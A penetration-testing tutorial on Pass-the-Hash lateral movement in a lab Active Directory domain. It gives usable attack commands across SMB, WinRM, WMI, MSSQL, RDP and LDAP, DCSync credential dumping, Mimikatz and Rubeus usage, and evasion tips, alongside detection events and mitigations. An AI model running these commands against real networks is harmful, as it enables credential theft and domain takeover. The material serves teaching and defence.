
Lateral Movement: Pass the Hash Attack

Introduction

In the world of Windows network security, one of the most powerful and dangerous lateral movement techniques is the Pass-the-Hash (PtH) attack. Unlike traditional password-based attacks that require cracking or guessing credentials, PtH allows an attacker to authenticate as a user using only the captured NTLM hash of their password — without ever knowing the actual plaintext password.

This article provides a comprehensive technical walkthrough of Pass-the-Hash attacks against a Windows Active Directory (AD) environment. We demonstrate the attack using multiple popular offensive security tools including NetExec (nxc), Impacket, Metasploit, Evil-WinRM, and pth-winexe. All techniques shown are for educational and authorized penetration testing purposes only.

Table of Contents

  • Introduction
  • Lab Environment
  • What is Pass-the-Hash (PtH)?
  • Key Concepts

SMB (Pass-the-Hash)

  • NXC
  • Impacket PSExec
  • Impacket SecretsDump
  • Metasploit (SMB PSExec)
  • pth-winexe

WinRM (Pass-the-Hash)

  • NXC
  • Evil-WinRM
  • Metasploit

WMI (Pass-the-Hash)

  • NXC
  • Impacket wmiexec

MSSQL (Pass-the-Hash)

  • NXC
  • Impacket mssqlclient
  • pth-sqsh

RDP (Pass-the-Hash)

  • xfreerdp

LDAP (Pass-the-Hash)

  • NXC
  • Metasploit
  • ldeep

Windows (Pass-the-Hash)

  • Mimikatz (sekurlsa::pth)
  • Rubeus (Overpass-the-Hash)

Mitigation Strategies

Conclusion

Lab Environment

  • Target: Windows Server 2019 Domain Controller (DC) 192.168.1.11
  • Domain: ignite.local
  • Attacker Machine: Kali Linux — 192.168.1.17
  • Target OS Build: Windows 10 / Server 2019 Build 17763 x64

What is a Pass-the-Hash Attack?

When a user logs on to Windows, the password itself is not stored. Windows keeps the NT hash (commonly called the NTLM hash): MD4 over the UTF-16LE encoding of the password. Local accounts' hashes live in the SAM hive, domain accounts' hashes live in NTDS.dit on the Domain Controllers, and for every user currently logged on, LSASS holds the hash in memory so that it can authenticate on that user's behalf, which is where tools such as Mimikatz read it.

PtH does not exploit a bug; it exploits the design of NTLM authentication. In the NTLM challenge/response exchange the client never sends the password: it proves possession of the credential by computing a response over the server's challenge (for NTLMv2, an HMAC-MD5 keyed with a value derived from the NT hash). Every step of that computation starts from the NT hash, so anyone who holds the hash can produce a valid response and authenticate as that user without cracking anything. The hash is a password-equivalent, and it stays valid until the password is changed.

Key Concepts

  • NT (NTLM) hash: MD4 of the UTF-16LE password, stored in SAM (local accounts) or NTDS.dit (domain accounts) and cached in LSASS for logged-on users
  • LM hash: the legacy, weak DES-based hash; disabled by default since Vista / Server 2008, so dumps show the empty-password LM hash aad3b435b51404eeaad3b435b51404ee in its place, and the tools below accept that value, 32 zeros, or an empty field before the colon
  • Dump (pwdump) format: <username>:<RID>:<LM hash>:<NT hash>:::, which is what secretsdump and nxc --sam / --ntds print; RID 500 is the built-in Administrator
  • Pass-the-Hash works because the NTLM response is computed from the hash, so the hash itself is the credential
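The following Python is an added example and is not code from the original article or from any of the tools it covers. It makes the Key Concepts concrete: it computes an NT hash exactly as Windows does (MD4 over the UTF-16LE password), turns a pwdump-style line into the LM:NT and NT-only forms that Impacket, Metasploit and nxc take, and derives an NTLMv2 response (the NTProofStr of MS-NLMP) from the hash alone, which is the whole reason the hash is a usable credential. The pwdump line and the challenge/blob bytes are constructed sample input; MD4 is implemented by hand because Python builds on OpenSSL 3 usually lack hashlib.new("md4").

```python
# Added example, not from the original article: why an NT hash is a
# password-equivalent. Computes the NT hash as Windows does (MD4 over the
# UTF-16LE password), parses a pwdump-style line into the LM:NT form the
# tools in this article expect, and derives an NTLMv2 response from the
# hash alone. MD4 is implemented here because Python builds on OpenSSL 3
# usually have no hashlib.new("md4").
import hashlib
import hmac
import struct

_MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4: three rounds of sixteen steps over 64-byte blocks."""
    rounds = (
        # (mixing function, additive constant, message-word order, shifts)
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
         range(16), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)          # pad to 56 mod 64
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        words = struct.unpack("<16I", msg[off:off + 64])
        v = list(state)                                    # [a, b, c, d]
        for f, const, order, shifts in rounds:
            for i in range(16):
                t = (-i) % 4   # register updated this step: a, d, c, b, a, ...
                x, y, z = v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
                v[t] = _rotl((v[t] + f(x, y, z) + words[order[i]] + const) & _MASK,
                             shifts[i % 4])
        state = [(s + w) & _MASK for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """The NT hash Windows stores: MD4 of the UTF-16LE password, hex-encoded."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump_line(line: str) -> dict:
    """Split '<user>:<RID>:<LM>:<NT>:::' into the forms the tools take."""
    user, rid, lm, nt = line.strip().split(":")[:4]
    lm = lm or EMPTY_LM                     # empty LM field -> canonical empty LM
    return {"user": user, "rid": int(rid), "lm": lm, "nt": nt,
            "lm_nt": f"{lm}:{nt}"}          # impacket -hashes / msf SMBPass; nxc -H takes nt


def ntlmv2_response(nt_hex: str, user: str, domain: str,
                    server_challenge: bytes, client_blob: bytes) -> bytes:
    """NTLMv2 NTProofStr (MS-NLMP 3.3.2) computed from the NT hash alone.
    ResponseKeyNT = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain))
    NTProofStr    = HMAC-MD5(ResponseKeyNT, ServerChallenge || client blob)"""
    response_key = hmac.new(bytes.fromhex(nt_hex),
                            (user.upper() + domain).encode("utf-16-le"),
                            hashlib.md5).digest()
    return hmac.new(response_key, server_challenge + client_blob, hashlib.md5).digest()


if __name__ == "__main__":
    # Constructed sample: the article's Administrator hash in pwdump form.
    rec = parse_pwdump_line(
        "Administrator:500:aad3b435b51404eeaad3b435b51404ee:32196b56ffe6f45e294117b91a83bf38:::")
    print("nxc -H", rec["nt"])
    print("impacket -hashes", rec["lm_nt"])
    # Constructed challenge and blob; a real blob carries timestamp, nonce and target info.
    challenge, blob = bytes(range(8)), b"\x01\x01" + b"\x00" * 6 + b"\x42" * 8
    print("NT hash of 'Password123':", nt_hash("Password123"))
    print("NTProofStr from hash only:",
          ntlmv2_response(rec["nt"], rec["user"], "ignite.local", challenge, blob).hex())
```

Nothing in ntlmv2_response ever needs the plaintext: a hash lifted from SAM, NTDS.dit or LSASS feeds straight into the same computation a legitimate client performs, which is what every tool in the sections below does for its own protocol.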

SMB (Pass the Hash)

NXC

nxc smb -x runs a command on the target over SMB using NTLM hash authentication (-H takes the NT hash, or LM:NT). It needs an account that is a local administrator on the target. Unless --exec-method pins one, nxc tries its execution methods in turn (wmiexec, atexec, smbexec); the service-creating ones leave a 7045 service-install event and the scheduled-task one a 4698 event, which makes them easier to spot than pure WMI execution. Also note that a hash for a local account other than the built-in RID 500 Administrator is refused on the admin shares by UAC remote restrictions unless LocalAccountTokenFilterPolicy is set to 1 on the target.

nxc smb 192.168.1.11 -u administrator -H 32196B56FFE6F45E294117B91A83BF38 -x ipconfig

Impacket-PSExec

impacket-psexec gives a remote shell over SMB using NTLM hash authentication. It uploads a service binary (RemComSvc) to the ADMIN$ share, creates a service with a random name to run it, and returns an interactive shell running as SYSTEM, which makes it a reliable way to get a high-privileged shell for lateral movement in Active Directory. The cost is noise: a file write to ADMIN$, a service creation (Event 7045 in the System log) and the named pipe it uses are all well-known PsExec indicators.

impacket-psexec ignite.local/administrator@192.168.1.11 -hashes :32196B56FFE6F45E294117B91A83BF38

Impacket-SecretsDump

impacket-secretsdump extracts credentials from a remote host using NTLM hash authentication. With local administrator rights it pulls the SAM (local account hashes), LSA secrets and cached domain logon hashes through the remote registry. Against a Domain Controller, with an account that has replication rights (Domain Admins by default), it uses the DRSUAPI replication interface instead, the DCSync technique, to retrieve every domain account's hash from NTDS.dit without reading the file itself. The output is in the pwdump format shown under Key Concepts and feeds directly into the other tools in this article, which is what makes it central to privilege escalation and lateral movement.

impacket-secretsdump ignite.local/shivam@192.168.1.11 -hashes :64FBAE31CC352FC26AF97CBDEF151E03

Metasploit (Microsoft Windows Authenticated User Code Execution)

exploit/windows/smb/psexec executes an arbitrary payload on the target using a valid local administrator username and password, or password hash, in the same way the SysInternals psexec utility does: it creates a service with a random name and description, runs the payload through it, and can clean the service up afterwards. The hash goes in SMBPass in LM:NT form; the 32 zeros (or aad3b435b51404eeaad3b435b51404ee) stand in for the absent LM hash.

use exploit/windows/smb/psexec
set rhosts 192.168.1.11
set smbuser administrator
set smbdomain ignite.local
set smbpass 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38
run

PTH-Winexe

The pth-winexe command enables remote command execution over SMB using NTLM hash authentication. It works by creating a temporary service on the target system and executing commands with elevated privileges, making it a powerful but less stealthy method for lateral movement.

pth-winexe -U Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.11 cmd.exe

WinRM (Pass the Hash)

NXC

nxc winrm authenticates to Windows Remote Management (HTTP on 5985, HTTPS on 5986) with an NT hash and, with -x, runs a command through it. The account must be a member of Administrators or Remote Management Users on the target. The command runs inside a wsmprovhost.exe process, so no service is created, but the logon is still recorded (Event 4624, logon type 3) and, where process creation or PowerShell script block logging is on, so is the command. It is commonly used for lateral movement in Active Directory environments.

nxc winrm 192.168.1.11 -u administrator -H 32196B56FFE6F45E294117B91A83BF38 -x ipconfig

Evil-WinRM

The evil-winrm command allows attackers to gain a fully interactive PowerShell session on a remote Windows machine using NTLM hash authentication. It is one of the most convenient and powerful methods for post-exploitation and lateral movement in Active Directory environments.

evil-winrm -i 192.168.1.11 -u administrator -H 32196B56FFE6F45E294117B91A83BF38

Metasploit

This module is used to execute scripts or payloads on a remote Windows system via WinRM.

use auxiliary/scanner/winrm/winrm_script_exec
set RHOSTS 192.168.1.11
set USERNAME administrator
set PASSWORD 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38
run

This module is used to execute commands on remote Windows systems via WinRM using valid credentials.

use auxiliary/scanner/winrm/winrm_cmd
set RHOSTS 192.168.1.11
set USERNAME administrator
set PASSWORD 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38
set CMD ipconfig
run

WMI (Pass the Hash)

NXC

The nxc wmi -x command enables remote execution of system commands on a target machine using NTLM hash authentication. It is a fast and effective method for lateral movement, allowing attackers to execute commands without requiring an interactive session.

nxc wmi 192.168.1.11 -u administrator -H 32196B56FFE6F45E294117B91A83BF38 -x dir

impacket-wmiexec

impacket-wmiexec gives a semi-interactive shell using NTLM hash authentication over WMI, that is, DCOM on TCP 135 plus a dynamic high port. No service is created, which is why it is considered quieter than PsExec, but it is not silent: by default each command's output is written to a file on the ADMIN$ share and read back over SMB (so 445 is still needed unless -nooutput is used), and on the target WmiPrvSE.exe spawns cmd.exe, a parent/child pair that process creation logging (Event 4688, Sysmon 1) exposes. It remains a popular choice for lateral movement in Active Directory environments.

impacket-wmiexec ignite.local/administrator@192.168.1.11 -hashes :32196B56FFE6F45E294117B91A83BF38

MSSQL (Pass the Hash)

NXC

This command uses NetExec (nxc) to authenticate to an MSSQL service with Windows (NTLM) authentication using the hash and to execute a system command. Execution goes through xp_cmdshell, which requires sysadmin on the instance; nxc switches xp_cmdshell on for the command if it is disabled, and that configuration change is itself visible in SQL Server's logs.

nxc mssql 192.168.1.9 -u administrator -H 32196B56FFE6F45E294117B91A83BF38 -x ipconfig

Impacket-MSSqlClient

The impacket-mssqlclient command enables authentication to MSSQL using NTLM hashes via Windows authentication. It provides a powerful interactive SQL shell that can be leveraged for database enumeration and, if privileges allow, full system compromise through command execution.

impacket-mssqlclient raj@192.168.1.9 -hashes 00000000000000000000000000000000:64FBAE31CC352FC26AF97CBDEF151E03 -windows-auth
  • raj@192.168.1.9 → User raj connecting to the target server
  • -hashes LM:NT → Supplies the LM hash (dummy) and NTLM hash (actual credential)
  • -windows-auth → Uses Windows/Active Directory authentication instead of SQL login

Pth-sqsh

The pth-sqsh command allows attackers to authenticate to MSSQL using NTLM hashes, bypassing the need for plaintext credentials. Once access is obtained, it provides an interactive SQL shell that can be leveraged for database enumeration and even remote command execution.

pth-sqsh -U 'ignite\Administrator' -P '00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38' -S 192.168.1.9

How it Works:

  • Uses sqsh (SQL shell client) with PTH support
  • Sends the NTLM hash during authentication
  • Connects via Windows Authentication
  • Grants interactive SQL access if successful

RDP (Pass the Hash)

xfreerdp

xfreerdp supports PtH to authenticate to RDP (port 3389) using the NT hash instead of a plaintext password, via the /pth: option.

This gives a full interactive desktop session from nothing but the hash. The caveat practitioners run into is that it only works when Restricted Admin mode is enabled on the target (HKLM\SYSTEM\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin set to 0); on a default Server 2019 it is not, and the connection is refused, which is why attackers with admin rights sometimes set that value first. Because it is a Restricted Admin logon, the user's credentials are never sent to the target: anything the session reaches over the network is authenticated as the target's computer account, not as Administrator.

xfreerdp3 /u:administrator /v:192.168.1.11 /cert:ignore /pth:32196B56FFE6F45E294117B91A83BF38 /timeout:20000 /size:1920x1080

LDAP (Pass the Hash)

NXC

The nxc ldap -M whoami command provides a quick and reliable way to validate NTLM hash-based authentication against Active Directory. It helps penetration testers confirm access before proceeding with deeper enumeration or exploitation.

nxc ldap 192.168.1.11 -u administrator -H 32196B56FFE6F45E294117B91A83BF38 -M whoami

Metasploit

auxiliary/gather/ldap_query is a Metasploit module used to query an LDAP server using either a custom LDAP query or a set of pre-built enumeration actions against an Active Directory Domain Controller.​

use auxiliary/gather/ldap_query
set RHOSTS 192.168.1.11
set USERNAME Administrator
set LDAPPassword 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38
set LDAPDOMAIN ignite.local
run

ldeep

ldeep is a Python-based Active Directory enumeration tool built for LDAP recon. Unlike plain ldapsearch it gives clean, human-readable output and supports several backends (LDAP, Kerberos, cache). -H takes the hash in LM:NT form (the LM part may be left empty), and -s takes the server as an LDAP URL (ldap:// or ldaps://), so the original command, which lost the scheme separator, reads:

ldeep ldap -u Administrator -H :32196B56FFE6F45E294117B91A83BF38 -d ignite.local -s ldap://192.168.1.11 users

Windows (Pass the Hash)

Mimikatz

Mimikatz runs on a Windows host the attacker already controls. sekurlsa::pth needs local administrator rights and SeDebugPrivilege (privilege::debug first), because it patches LSASS.

The command starts a new process (cmd.exe by default, or whatever /run: names) whose logon session carries the supplied NT hash instead of a password. Any NTLM authentication that process performs afterwards, such as mapping \\DC\C$ or running PsExec, uses that hash, so this is the Windows-side equivalent of the Kali tools above and a core lateral movement step once hashes have been dumped from memory. On the source host it shows up as a 4624 logon of type 9 (NewCredentials) from the seclogo logon process.

sekurlsa::pth /user:Administrator /domain:ignite.local /ntlm:32196B56FFE6F45E294117B91A83BF38

Rubeus

Rubeus asktgt requests a Kerberos TGT for the account using the NT hash as its RC4-HMAC key (the NT hash is the account's RC4 Kerberos key, which is why /rc4: takes it) and, with /ptt, imports the ticket into the current logon session. This is Overpass-the-Hash: an NTLM credential is turned into Kerberos tickets, so later access to SMB, LDAP or WinRM authenticates with Kerberos and no NTLM traffic appears on the wire. The trade-off is that an RC4 AS-REQ stands out on a domain where AES is the norm (Event 4768 with TicketEncryptionType 0x17 for an account that has AES keys); if the AES256 key is available, /aes256: yields a ticket that blends in. Requesting it from a fresh logon session (Rubeus' /createnetonly option) keeps the imported ticket from overwriting your own.

Rubeus.exe asktgt /domain:ignite.local /user:Administrator /rc4:32196b56ffe6f45e294117b91a83bf38 /ptt

Mitigation Strategies

  • Enable Windows Defender Credential Guard so that domain NTLM hashes and Kerberos keys for interactive logons are isolated in a virtualization-protected process instead of plain LSASS memory (requires UEFI and virtualization-based security). It raises the cost of stealing hashes from a running host; it does nothing against a hash already obtained elsewhere, for example from a SAM or NTDS.dit dump
  • Apply KB2871997 to Windows 7 / Server 2008 R2 / 8 / Server 2012 so they gain the Protected Users group, Restricted Admin RDP, and the "Local account" (S-1-5-113) and "Local account and member of Administrators group" (S-1-5-114) SIDs; denying network and remote interactive logon to those SIDs via Group Policy stops PtH with local administrator hashes, and together with the default UAC remote restrictions (LocalAccountTokenFilterPolicy = 0) it limits lateral movement with non-RID-500 local accounts
  • Implement the principle of least privilege — do not use Domain Admin accounts for daily operations
  • Disable NTLM authentication where possible — enforce Kerberos with AES encryption
  • Enable Protected Users Security Group for sensitive accounts — blocks NTLM auth for members
  • Implement tiered administration model — separate Tier 0 (DC), Tier 1 (Servers), Tier 2 (Workstations)
  • Deploy Microsoft LAPS (Local Administrator Password Solution) to randomize local admin passwords
  • Enable SMB Signing to prevent relay attacks that often complement PtH
  • Restrict WinRM access via Windows Firewall to authorized management hosts only
  • Monitor and alert on lateral movement patterns with a SIEM (Splunk, Microsoft Sentinel, etc.): Security 4624 logons of type 3 with AuthenticationPackageName NTLM from hosts that should be using Kerberos, 4776 NTLM validations on the DCs, 7045 service installs and 4698 scheduled task creations (PsExec- and atexec-style execution), 4688 process creation with WmiPrvSE.exe or wsmprovhost.exe as the parent, 4624 type 9 logons from seclogo on workstations (sekurlsa::pth), and 4768 TGT requests with encryption type 0x17 for accounts that have AES keys (Overpass-the-Hash)

Conclusion

Pass-the-Hash remains one of the most powerful and widely-used lateral movement techniques in Active Directory environments. The attack chain demonstrated in this article — from DCSync credential dumping to full RDP graphical access — illustrates how a single compromised NTLM hash can grant an attacker complete domain dominance across multiple protocols and services.

The key takeaways for penetration testers are: PtH works natively with a rich ecosystem of tools; every protocol shown here (SMB, WMI, WinRM, RDP, MSSQL, LDAP) accepts an NT hash in place of a password, with RDP needing Restricted Admin mode on the target; and a single admin hash can propagate access across the entire environment. For defenders, the priority must be reducing NTLM usage, deploying Credential Guard and restricting local account network logons, and establishing lateral movement detection through event log monitoring and behavioral analytics.

3 thoughts on “Lateral Movement: Pass the Hash Attack”

  1. One thing I don’t understand: If you already have administrator access, why do you need to pass the hash? Doesn’t the admin account let you do whatever you want?

    1. Hi Jon,
      This is not for the same machine from which the administrator password hash is captured. For example, after compromising the machine you have only normal privileges. Then, luckily, you have figured out how to escalate your privileges and become a high-level privileged user on that machine. Now you cannot (well, logically you can) change the Administrator password, because then the Administrator's password hash will change and they will know. Rather, you dump the SAM and SYSTEM hives to extract the hashes later. Now, from a remote system, you can pass the hash of the Administrator user (after cracking) to the compromised system whenever you want to maintain persistence. I hope this clears your doubt. Thanks.
